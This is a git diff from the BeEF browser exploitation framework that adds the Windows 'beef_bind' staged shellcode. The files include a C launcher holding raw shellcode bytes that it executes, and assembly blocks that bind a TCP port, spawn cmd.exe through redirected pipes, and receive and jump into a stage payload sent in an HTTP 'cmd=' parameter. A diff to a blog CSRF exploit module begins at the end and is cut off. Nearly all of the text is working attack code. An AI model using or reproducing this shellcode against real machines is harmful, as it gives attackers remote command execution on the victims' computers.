+	pop ebp				;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stager.asm"	;setup bind port, receive web request, locate stage, execute it
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
new file mode 100644
index 000000000..a939bd498
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
@@ -0,0 +1,36 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+A standalone version can be compiled with MinGW:
+c:\MinGW\bin>gcc -o beefstager.exe beefstager.c
+
+and then executed with:
+c:\MinGW\bin>beefstager.exe 1234
+
+or just with the default port 4444:
+c:\MinGW\bin>beefstager.exe
+**/
+
+
+#include 
+
+char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6";
+
+int main(int argc, char **argv)
+{
+if (argc == 2){
+  int port;
+  port = atoi(argv[1]);
+  if (port <= 0xFFFF){
+    code[200] = ((port & 0xFF00) >> 8) & 0xFF;
+    code[201] = ((port & 0xFF));
+  }	
+}
+
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+ return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm
new file mode 100644
index 000000000..2acc13dde
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm
@@ -0,0 +1,97 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+
+; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+; Output: The return value from the API call will be in EAX.
+; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+; Note: This function is unable to call forwarded exports.
+
+api_call:
+  pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+  mov ebp, esp           ; Create a new stack frame
+  xor edx, edx           ; Zero EDX
+  mov edx, [fs:edx+48]   ; Get a pointer to the PEB
+  mov edx, [edx+12]      ; Get PEB->Ldr
+  mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+next_mod:                ;
+  mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+  movzx ecx, word [edx+38] ; Set ECX to the length we want to check 
+  xor edi, edi           ; Clear EDI which will store the hash of the module name
+loop_modname:            ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the name
+  cmp al, 'a'            ; Some versions of Windows use lower case module names
+  jl not_lowercase       ;
+  sub al, 0x20           ; If so normalise to uppercase
+not_lowercase:           ;
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  loop loop_modname      ; Loop untill we have read enough
+  ; We now have the module hash computed
+  push edx               ; Save the current position in the module list for later
+  push edi               ; Save the current module hash for later
+  ; Proceed to itterate the export address table, 
+  mov edx, [edx+16]      ; Get this modules base address
+  mov eax, [edx+60]      ; Get PE header
+  add eax, edx           ; Add the modules base address
+  mov eax, [eax+120]     ; Get export tables RVA
+  test eax, eax          ; Test if no export address table is present
+  jz get_next_mod1       ; If no EAT present, process the next module
+  add eax, edx           ; Add the modules base address
+  push eax               ; Save the current modules EAT
+  mov ecx, [eax+24]      ; Get the number of function names  
+  mov ebx, [eax+32]      ; Get the rva of the function names
+  add ebx, edx           ; Add the modules base address
+  ; Computing the module hash + function hash
+get_next_func:           ;
+  jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
+  dec ecx                ; Decrement the function name counter
+  mov esi, [ebx+ecx*4]   ; Get rva of next module name
+  add esi, edx           ; Add the modules base address
+  xor edi, edi           ; Clear EDI which will store the hash of the function name
+  ; And compare it to the one we want
+loop_funcname:           ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the ASCII function name
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+  jne loop_funcname      ; If we have not reached the null terminator, continue
+  add edi, [ebp-8]       ; Add the current module hash to the function hash
+  cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for 
+  jnz get_next_func      ; Go compute the next function hash if we have not found it
+  ; If found, fix up stack, call the function and then value else compute the next one...
+  pop eax                ; Restore the current modules EAT
+  mov ebx, [eax+36]      ; Get the ordinal table rva      
+  add ebx, edx           ; Add the modules base address
+  mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+  mov ebx, [eax+28]      ; Get the function addresses table rva  
+  add ebx, edx           ; Add the modules base address
+  mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+  add eax, edx           ; Add the modules base address to get the functions actual VA
+  ; We now fix up the stack and perform the call to the desired function...
+finish:
+  mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+  pop ebx                ; Clear off the current modules hash
+  pop ebx                ; Clear off the current position in the module list
+  popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+  pop ecx                ; Pop off the origional return address our caller will have pushed
+  pop edx                ; Pop off the hash value our caller will have pushed
+  push ecx               ; Push back the correct return value
+  jmp eax                ; Jump into the required function
+  ; We now automagically return to the correct caller...
+get_next_mod:            ;
+  pop eax                ; Pop off the current (now the previous) modules EAT
+get_next_mod1:           ;
+  pop edi                ; Pop off the current (now the previous) modules hash
+  pop edx                ; Restore our position in the module list
+  mov edx, [edx]         ; Get the next module
+  jmp short next_mod     ; Process this module
\ No newline at end of file
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm
new file mode 100644
index 000000000..c88ab6e23
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm
@@ -0,0 +1,177 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_virtualalloc.asm"
+			 ; Input: None
+			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+			 ; Clobbers: EAX, EBX, ECX, EDX
+
+  mov esi, eax		 ; point esi to start of buffer, used as pseudo-frame pointer
+
+%include "src/block_pipes.asm"
+			 ; Create pipes to redirect stage stdin, stdout, stderr
+			 ; Input: EBP is api_call
+			 ; Output:
+			 ;       esp+00  child stdin  read  file descriptor (inherited)
+			 ;       esp+04  child stdin  write file descriptor (not inherited)
+			 ;       esp+08  child stdout read  file descriptor (not inherited)
+			 ;       esp+12  child stdout write file descriptor (inherited)
+			 ;       esp+16  lpPipeAttributes structure (not used after block - 12 bytes)
+			 ; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+  mov edi,esi		 ; save esi since it gets clobbered
+
+%include "src/block_shell_pipes.asm"
+			 ; Create process with redirected stdin, stdout, stderr to our pipes
+			 ; Input:
+			 ;       EBP is api_call
+			 ;       esp+00  child stdin  read  file descriptor (inherited)
+			 ;       esp+04  not used
+			 ;       esp+08  not used
+			 ;       esp+12  child stdout write file descriptor (inherited)
+			 ; Output: None.
+			 ; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+  mov esi,edi		 ; restore esi
+
+ReadLoop:		 ; Read output from the child process
+
+clear_buffer:
+  mov ecx,0xFF8		 ; zero output buffer starting at esi+8 with 0xFF8 nulls
+  lea eax,[esi+8]	 ; point eax to start of command/output buffer
+zero_buffer:            
+  mov byte [eax],0	 ; push a null dword
+  inc eax		 ; point to the next byte in the buffer
+  loop zero_buffer	 ; keep looping untill we have zeroed the buffer
+
+
+response_headers:
+  push esi		 ; save pointer to start of buffer
+  lea edi,[esi+1048]	 ; set pointer to output buffer
+  call get_headers       ; locate the static http response headers
+  db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a
+get_headers:
+  pop esi		 ; get pointer to response headers into esi
+  mov ecx, 98            ; length of http response headers
+  rep movsb              ; move the http headers into the buffer
+  pop esi		 ; restore pointer to start of buffer
+
+
+bind_port:
+  push esi		 ; save buffer pointer onto stack
+%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
+			 ; Input: EBP must be the address of 'api_call'.
+			 ; Output: EDI will be the newly connected clients socket
+			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+  add esp, 0x1A0	 ; restore stack pointer
+  pop esi		 ; restore buffer pointer
+  mov [esi], edi	 ; save external socket to buffer
+
+
+recv:                    ; Receive the web request - must be a post request with command ending with a new line character
+  push byte 0            ; flags
+  push 0x400             ; allocated space for command (512 bytes)
+  mov ebx, esi           ; start of our request/response memory buffer
+  add ebx, 8		 ; start of our allocated command space
+  push ebx               ; start of our allocated command space
+  push dword [esi]       ; external socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( external_socket, buffer, size, 0 );
+
+find_cmd:  		 ; Search for "cmd=" in the web request
+  mov edx, [esp+0x64]    ; stage stdin read file descriptor (40)
+  mov ecx, 0x400         ; set ecx to be our buffer counter
+next:
+  cmp dword [ebx], 0x3d646d63   ; check if ebx points to "cmd="
+  jz cmd_found           ; if we found "cmd=" then parse the command
+  inc ebx                ; point ebx to next char in request data
+  dec ecx                ; dec our buffer counter
+  jecxz read_file_check  ; if our counter is 0 then we found no command, so recv more data
+  jmp short next         ; check next location for "cmd="
+cmd_found:               ; now pointing to start of our command - MAY fail if the command is cut off
+  add ebx, 0x03          ; starts off pointing at "cmd=" so add 3 (plus  inc eax below) to point to command
+
+next_cmd_char:
+  inc ebx                ; move our command string pointer up one character
+  push ebx               ; save command pointer to the stack
+
+write_file:
+  push 0		 ; pOverlapped = NULL
+  lea edi,[esi+1040]	 ; 4 bytes for bytes written
+  push edi		 ; pBytesWritten
+  push 1		 ; nBytesToWrite
+  push ebx		 ; command string in buffer
+  mov ebx,[esp+70h]	 ; Child stdin
+  push ebx		 ; child stdin
+  push 0x5BAE572D	 ; hash(kernel32.dll, WriteFile)
+  call ebp		 ; WriteFile
+
+  pop ebx                ; restore command pointer from the stack
+  cmp byte [ebx], 0x0a   ; check if we have just sent a new line
+  jnz next_cmd_char      ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket
+
+
+%include "src/block_sleep.asm"
+			 ; Input: None
+			 ; Output: None. Sleeps for x seconds
+			 ; Clobbers: None
+
+read_file_check:
+  xor eax, eax		 ; zero eax
+  push eax		 ; lpBytesLeftThisMessage
+  lea ebx,[esi+4]	 ; address to output the result - num bytes available to read
+  push ebx		 ; lpTotalBytesAvail
+  push eax		 ; lpBytesRead
+  push eax		 ; nBufferSize
+  push eax		 ; lpBuffer
+  lea ebx,[esp+74h]	 ; child stdout read address
+  mov ebx, [ebx]	 ; child stdout read file descriptor
+  push ebx               ; hNamedPipe
+  push 0xB33CB718	 ; hash(kernel32.dll,PeekNamedPipe)
+  call ebp		 ; PeekNamedPipe
+
+  test eax, eax		 ; check the function return correctly
+  jz close_handle	 ; no, then close the connection and start again
+  mov eax, [esi+4]	 ; Grab the number of bytes available
+  test eax, eax		 ; check for no bytes to read
+  jz close_handle	 ; no, then close the connection and start again
+
+read_file:
+  push 0                 ; pOverlapped = NULL
+  lea edi,[esi+1044]     ; output: number of bytes read
+  push edi               ; pBytesRead
+  push 0xB86             ; BytesToRead: remaining space in our allocated buffer
+  ;lea edi,[esi+1114]     ; start of remaining space in buffer after response headers
+  lea edi,[esi+1146]     ; start of remaining space in buffer after response headers
+  push edi               ; start of remaining space in buffer after response headers
+  lea ebx,[esp+70h]	 ; child stdout read address
+  mov ebx, [ebx]	 ; child stdout read file descriptor
+  push ebx               ; hFile: child stdout address
+  push 0xBB5F9EAD	 ; hash(kernel32.dll,ReadFile)
+  call ebp               ; ReadFile
+
+
+send_output:             ; send buffer to the external socket
+  push byte 0            ; flags
+  push 0xBE8             ; len
+  lea edi,[esi+1048]     ; start of output buffer
+  push edi               ; pointer to buffer
+  push dword [esi]       ; external socket
+  push 0x5F38EBC2        ; hash ( "ws2_32.dll", "send" )
+  call ebp               ; send(external_socket, *buf, len, flags);
+
+
+close_handle:
+  push dword [esi]	 ; hObject: external socket
+  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
+  call ebp		 ; CloseHandle
+
+  jmp ReadLoop
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm
new file mode 100644
index 000000000..50059ad2e
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm
@@ -0,0 +1,47 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
+			 ; Input: EBP must be the address of 'api_call'.
+			 ; Output: EDI will be the newly connected clients socket
+			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+%include "src/block_virtualalloc.asm"
+			 ; Input: None
+			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
+			 ; Clobbers: EAX, EBX, ECX, EDX
+
+  mov esi, eax		 ; save pointer to buffer since eax gets clobbered
+
+recv:                    ; Receive the web request containing the stage
+  push byte 0		 ; flags
+  push ebx		 ; allocated space for stage
+  push eax		 ; start of our allocated command space
+  push edi		 ; external socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( external_socket, buffer, size, 0 );
+
+
+close_handle:
+  push edi		 ; hObject: external socket
+  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
+  call ebp		 ; CloseHandle
+
+find_cmd:		 ; Search for "cmd=" in the web request for our payload
+  cmp dword [esi], 0x3d646d63   ; check if ebx points to "cmd="
+  jz cmd_found           ; if we found "cmd=" then parse the command
+  inc esi                ; point ebx to next char in request data
+  jmp short find_cmd     ; check next location for "cmd="
+cmd_found:               ; now pointing to start of our command - MAY fail if the command is cut off
+;  add esi,4              ; starts off pointing at "cmd=" so add 3 (plus  inc eax below) to point to command ... this compiles to 6 byte opcode
+  db 0x83, 0xC6, 0x04	 ; add esi,4 ... but only 3 byte opcode
+
+  jmp esi		 ; jump to our stage payload
+
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm
new file mode 100644
index 000000000..3ac5f8c70
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm
@@ -0,0 +1,63 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+  push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
+  push 0x5F327377        ; ...
+  push esp               ; Push a pointer to the "ws2_32" string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "ws2_32" )
+  
+  mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
+  sub esp, eax           ; alloc some space for the WSAData structure
+  push esp               ; push a pointer to this stuct
+  push eax               ; push the wVersionRequested parameter
+  push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
+  call ebp               ; WSAStartup( 0x0190, &WSAData );
+  
+  push eax               ; if we succeed, eax wil be zero, push zero for the flags param.
+  push eax               ; push null for reserved parameter
+  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
+  push eax               ; we do not specify a protocol
+  inc eax                ;
+  push eax               ; push SOCK_STREAM
+  inc eax                ;
+  push eax               ; push AF_INET
+  push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
+  call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+  xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
+  
+  xor ebx, ebx           ; Clear EBX
+  push ebx               ; bind to 0.0.0.0
+  push 0x5C110002        ; family AF_INET and port 4444
+  mov esi, esp           ; save a pointer to sockaddr_in struct
+  push byte 16           ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+  push esi               ; pointer to the sockaddr_in struct
+  push edi               ; socket
+  push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
+  call ebp               ; bind( s, &sockaddr_in, 16 );
+
+  push ebx               ; backlog
+  push edi               ; socket
+  push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
+  call ebp               ; listen( s, 0 );
+
+  push ebx               ; we set length for the sockaddr struct to zero
+  push ebx               ; we dont set the optional sockaddr param
+  push edi               ; listening socket
+  push 0xE13BEC74        ; hash( "ws2_32.dll", "accept" )
+  call ebp               ; accept( s, 0, 0 );
+  
+  push edi               ; push the listening socket to close
+  xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
+  push 0x614D6E75        ; hash( "ws2_32.dll", "closesocket" )
+  call ebp               ; closesocket( s );
+  
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm
new file mode 100644
index 000000000..941564c34
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm
@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP is api_call
+; Output:
+;       esp+00	child stdin  read  file descriptor (inherited)
+;       esp+04	child stdin  write file descriptor (not inherited)
+;       esp+08	child stdout read  file descriptor (not inherited)
+;       esp+12	child stdout write file descriptor (inherited)
+;       esp+16	lpPipeAttributes structure (not used after block - 12 bytes)
+; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+  push 1		 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
+  push 0
+  push 0x0C
+
+create_pipe_stdout:
+  push 0		 ; allocate space on stack for child stdout file descriptor
+  mov ebx, esp		 ; save location of where the child stdout Write file descriptor will be
+  push 0		 ; allocate space on stack for child stdout file descriptor
+  mov ecx, esp		 ; save location of where the child stdout Read file descriptor will be
+
+  push 0                 ; nSize
+  lea edi,[esp+12]	 ; lpPipeAttributes - inherited
+  push edi
+  push ebx               ; stdout write file descriptor
+  push ecx               ; stdout read file descriptor
+  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
+  call ebp               ; CreatePipe( Read, Write, 0, 0 )
+
+create_pipe_stdin:
+  push 0		; allocate space on stack for child stdout file descriptor
+  mov ebx, esp		; save location of where the child stdout Write file descriptor will be
+  push 0		; allocate space on stack for child stdout file descriptor
+  mov ecx, esp		; save location of where the child stdout Read file descriptor will be
+
+  push 0                 ; nSize
+  lea edi,[esp+20]	 ; lpPipeAttributes - inherited
+  push edi
+  push ebx               ; stdout write file descriptor
+  push ecx               ; stdout read file descriptor
+  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
+  call ebp               ; CreatePipe( Read, Write, 0, 0 )
+
+no_inherit_read_handle:	 ; ensure read and write handles to child proc pipes for are not inherited
+  mov ebx,[esp+8] 
+  push 0
+  push 1
+  push ebx		 ; hChildStdoutRd is the address we set in the CreatePipe call
+  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
+  call ebp		 ; SetHandleInformation
+
+no_inherit_write_handle:
+  mov ebx,[esp+4]
+  push 0
+  push 1
+  push ebx		 ; hChildStdinRw is the address we set in the CreatePipe call
+  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
+  call ebp	 	 ; SetHandleInformation
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm
new file mode 100644
index 000000000..33e807866
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm
@@ -0,0 +1,56 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Credits: Some code borrowed from block_shell.asm; Stephen Fewer
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input:
+;	EBP is api_call
+;       esp+00  child stdin  read  file descriptor (inherited)
+;       esp+04  not used
+;       esp+08  not used
+;       esp+12  child stdout write file descriptor (inherited)
+; Output: None.
+; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+shell:
+  push 0x00646D63        ; push our command line: 'cmd',0
+  mov ebx, esp           ; save a pointer to the command line
+  push dword [esp+16]	 ; child stdout write file descriptor for process stderr
+  push dword [esp+20]	 ; child stdout write file descriptor for process stdout
+  push dword [esp+12]	 ; child stdin read file descriptor for process stdout
+  xor esi, esi           ; Clear ESI for all the NULL's we need to push
+  push byte 18           ; We want to place (18 * 4) = 72 null bytes onto the stack
+  pop ecx                ; Set ECX for the loop
+push_loop:               ;
+  push esi               ; push a null dword
+  loop push_loop         ; keep looping untill we have pushed enough nulls
+  mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+  lea eax, [esp + 16]    ; Set EAX as a pointer to our STARTUPINFO Structure
+  mov byte [eax], 68     ; Set the size of the STARTUPINFO Structure
+  ; perform the call to CreateProcessA
+  push esp               ; Push the pointer to the PROCESS_INFORMATION Structure 
+  push eax               ; Push the pointer to the STARTUPINFO Structure
+  push esi               ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+  push esi               ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+  push esi               ; We dont specify any dwCreationFlags 
+  inc esi                ; Increment ESI to be one
+  push esi               ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+  dec esi                ; Decrement ESI back down to zero
+  push esi               ; Set lpThreadAttributes to NULL
+  push esi               ; Set lpProcessAttributes to NULL
+  push ebx               ; Set the lpCommandLine to point to "cmd",0
+  push esi               ; Set lpApplicationName to NULL as we are using the command line param instead
+  push 0x863FCC79        ; hash( "kernel32.dll", "CreateProcessA" )
+  call ebp               ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
+  ; perform the call to WaitForSingleObject
+;  mov eax, esp           ; save pointer to the PROCESS_INFORMATION Structure
+;  dec esi                ; Decrement ESI down to -1 (INFINITE)
+;  push esi               ; push INFINITE inorder to wait forever
+;  inc esi                ; Increment ESI back to zero
+;  push dword [eax]       ; push the handle from our PROCESS_INFORMATION.hProcess
+;  push 0x601D8708        ; hash( "kernel32.dll", "WaitForSingleObject" )
+;  call ebp               ; WaitForSingleObject( pi.hProcess, INFINITE );
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm
new file mode 100644
index 000000000..4d3b57ce2
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm
@@ -0,0 +1,15 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: None. Sleeps for specified seconds.
+; Clobbers: None
+
+  push 1000                       ; milliseconds
+  push 0xE035F044                 ; hash (kernel32.dll, Sleep)
+  call ebp                        ; Sleep(1000ms)
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
new file mode 100644
index 000000000..f12b2f17c
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+; Clobbers: EAX, EBX, ECX, EDX
+
+  mov ebx,0x1000	 ; setup our flags and buffer size in ebx
+allocate_memory:         ; Alloc a buffer for the request and response data
+  push byte 0x40         ; PAGE_EXECUTE_READWRITE - don't need execute but may as well
+  push ebx               ; MEM_COMMIT
+  push ebx               ; size of memory to be allocated (4096 bytes)
+  push byte 0            ; NULL as we dont care where the allocation is
+  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
index 7e312ae66..6522246c0 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
